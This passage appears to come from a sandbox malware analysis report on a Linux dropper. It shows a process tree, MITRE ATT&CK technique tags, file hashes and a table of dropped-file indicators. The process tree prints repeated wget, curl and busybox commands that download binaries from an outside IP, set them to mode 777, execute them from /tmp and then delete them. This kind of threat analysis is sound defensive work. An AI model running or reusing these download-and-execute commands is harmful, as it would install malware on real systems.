  rm 57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
  2⤵
  PID:963
- /usr/bin/wget
  wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo
  2⤵
  PID:964
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:965
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo
  2⤵
  PID:966
- /bin/chmod
  chmod 777 QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo
  2⤵
  - File and Directory Permissions Modification
  PID:967
- /tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo
  ./QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo
  2⤵
  - Executes dropped EXE
  PID:968
- /bin/rm
  rm QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo
  2⤵
  PID:969
- /usr/bin/wget
  wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P
  2⤵
  PID:970
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:971
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P
  2⤵
  PID:972
- /bin/chmod
  chmod 777 MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P
  2⤵
  - File and Directory Permissions Modification
  PID:973
- /tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P
  ./MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P
  2⤵
  - Executes dropped EXE
  PID:974
- /bin/rm
  rm MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P
  2⤵
  PID:975
- /usr/bin/wget
  wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw
  2⤵
  PID:976
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:977
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw
  2⤵
  PID:978
- /bin/chmod
  chmod 777 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw
  2⤵
  - File and Directory Permissions Modification
  PID:979
- /tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw
  ./7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw
  2⤵
  - Executes dropped EXE
  PID:980
- /bin/rm
  rm 7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw
  2⤵
  PID:981
- /usr/bin/wget
  wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0
  2⤵
  PID:982
- /usr/bin/curl
  curl -O http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:983
- /bin/busybox
  /bin/busybox wget http://216.126.231.240/bins/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0
  2⤵
  PID:984
- /bin/chmod
  chmod 777 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0
  2⤵
  - File and Directory Permissions Modification
  PID:985
- /tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0
  ./3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0
  2⤵
  - Executes dropped EXE
  PID:986
- /bin/rm
  rm 3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0
  2⤵
  PID:987

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit

ioc	pid	Process
/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok	745	57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
/tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo	752	QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo
/tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P	774	MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P
/tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw	812	7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw
/tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5	818	mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5
/tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0	831	3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0
/tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in	859	WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in
/tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR	866	DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR
/tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss	872	Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss
/tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw	878	Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw
/tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE	884	rjYdYLogHbI2GtZk51UklOvLOURts6OQBE
/tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao	890	aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
/tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf	896	8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
/tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5	902	xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5
/tmp/aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao	908	aWXRmc8WIp3FOlngkyq1gZN3RgRtDEZnao
/tmp/8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf	914	8xP5gxwZJYKeXrYUQq9dgRVJEYVxrwUwwf
/tmp/xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5	920	xArcuxV9Xoc64HBeDwvoiKWBgPPBUKM8e5
/tmp/WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in	926	WVGQ4QruEnGbqmbx5fM5xXbcbSwKkcv4in
/tmp/DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR	932	DZAoD4VUWUhLM5rOZVW5VONz7To4u8iiRR
/tmp/Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss	938	Qc3EnRsB8OzBeIFFdEVACavqo9MlNz0uss
/tmp/Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw	944	Uvi3UdkMnQWwwG1SlbcaZ67APlFkzYQEYw
/tmp/rjYdYLogHbI2GtZk51UklOvLOURts6OQBE	950	rjYdYLogHbI2GtZk51UklOvLOURts6OQBE
/tmp/mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5	956	mPtC5QPODWW8xel5eZZQ8VyjDY3mTGWKY5
/tmp/57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok	962	57C1VW4rL6KfWNz0gcmrup04pnj6f5pDok
/tmp/QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo	968	QsMMl9cY820P9umz3hznnMzUzNwCFQ9yoo
/tmp/MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P	974	MMLp22wLX7o4uCI3W5N0c1nz8osjSM0m1P
/tmp/7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw	980	7IB2Sin7Ap8vrYCay79zowFL3EWhM2eHkw
/tmp/3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0	986	3noktzcDsW2yyDeNwRcRVC8CrxljVx4pi0